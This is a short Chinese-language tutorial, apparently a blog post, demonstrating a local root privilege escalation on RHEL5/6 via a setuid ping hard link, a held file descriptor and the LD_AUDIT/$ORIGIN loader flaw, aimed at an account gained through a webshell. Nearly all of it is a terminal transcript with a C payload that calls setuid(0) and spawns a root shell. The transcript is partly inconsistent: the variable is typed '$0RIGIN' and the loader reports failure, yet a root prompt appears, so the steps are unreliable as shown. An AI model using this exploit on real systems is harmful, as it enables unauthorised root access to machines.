利用Linux漏洞进行提权
提权:普通账号 --》》 root
RHEL5-RHEL6下都适用
webshell 挂码登录普通账号
[root@PC1 ~]# useradd mk
[root@PC1 ~]# su mk
[mk@PC1 /]$ ll -d /tmp/
drwxrwxrwt. 3 root root 4096 7?. 11 03:54 /tmp/
[mk@PC1 /]$ cd /tmp/
[mk@PC1 tmp]$ mkdir exploit
[mk@PC1 tmp]$ ll -d /bin/ping
-rwsr-xr-x. 2 root root 40760 9?. 26 2013 /bin/ping
[mk@PC1 tmp]$ ln /bin/ping /tmp/exploit/target
[mk@PC1 tmp]$ ll !$
ll /tmp/exploit/target
-rwsr-xr-x. 3 root root 40760 9?. 26 2013 /tmp/exploit/target
[mk@PC1 tmp]$ exec 3< /tmp/exploit/target
[mk@PC1 tmp]$ ll /proc/$$/fd/3
lr-x------. 1 mk mk 64 7?. 11 06:04 /proc/25208/fd/3 -> /tmp/exploit/target
[mk@PC1 tmp]$ ll /tmp/exploit
总用量 40
-rwsr-xr-x. 3 root root 40760 9月 26 2013 target
[mk@PC1 tmp]$ rm -rf /tmp/exploit/
[mk@PC1 tmp]$ ll /proc/$$/fd/3
lr-x------. 1 mk mk 64 7月 11 06:04 /proc/25208/fd/3 -> /tmp/exploit/target (deleted)
[mk@PC1 tmp]$ vim payload.c
void __attribute__((constructor)) init() //__这是两个下划线
{
setuid(0);
system("/bin/bash");
}
[mk@PC1 tmp]$ yum -y install gcc
Loaded plugins: fastestmirror, security
You need to be root to perform this command.
[mk@PC1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[mk@PC1 tmp]$ ll /tmp/exploit
-rwxrwxr-x. 1 mk mk 6020 7月 11 07:29 /tmp/exploit
[mk@PC1 tmp]$ LD_AUDIT="\$0RIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$0RIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@PC1 ~]#
网友评论